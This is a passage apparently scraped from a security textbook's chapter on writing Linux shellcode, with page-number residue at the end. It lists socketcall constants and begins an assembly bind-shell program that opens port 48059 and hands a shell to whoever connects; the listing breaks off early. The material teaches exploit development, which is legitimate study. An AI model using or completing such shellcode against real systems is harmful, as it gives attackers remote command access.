h
To build a basic socket, you will only need
??? SYS_SOCKET 1
??? SYS_BIND 2
Chapter 10: Writing Linux Shellcode
223
PART III
??? SYS_CONNECT 3
??? SYS_LISTEN 4
??? SYS_ACCEPT 5
??? ecx A pointer to an array of arguments for the particular function
Believe it or not, you now have all you need to jump into assembly socket programs.
port_bind_asm.asm
Armed with this info, we are ready to start building the assembly of a basic program to
bind the port 48059 to the localhost IP and wait for connections. Once a connection is
gained, the program will spawn a shell and provide it to the connecting client.
NOTE The following code segment can seem intimidating, but it is quite
simple. Refer back to the previous sections, in particular the last section, and
realize that we are just implementing the system calls (one after another).
# cat ./port_bind_asm.asm
BITS 32
section .text
global _start
_start:
xor eax,eax ;clear eax
xor ebx,ebx ;clear ebx
xor edx,edx ;clear edx
;server=socket(2,1,0)
push eax ; third arg to socket: 0
push byte 0x1 ; second arg to socket: 1
push byte 0x2 ; first arg to socket: 2
mov ecx,esp ; set addr of array as 2nd arg to socketcall
inc bl ; set first arg to socketcall to # 1
mov al,102 ; call socketcall # 1: SYS_SOCKET
int 0x80 ; jump into kernel mode, execute the syscall
mov esi,eax ; store the return value (eax) into esi (server)
;bind(server,(struct sockaddr *)&serv_addr,0x10)
push edx ; still zero, terminate the next value pushed
push long 0xBBBB02BB ; build struct:port,sin.
Pages:
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429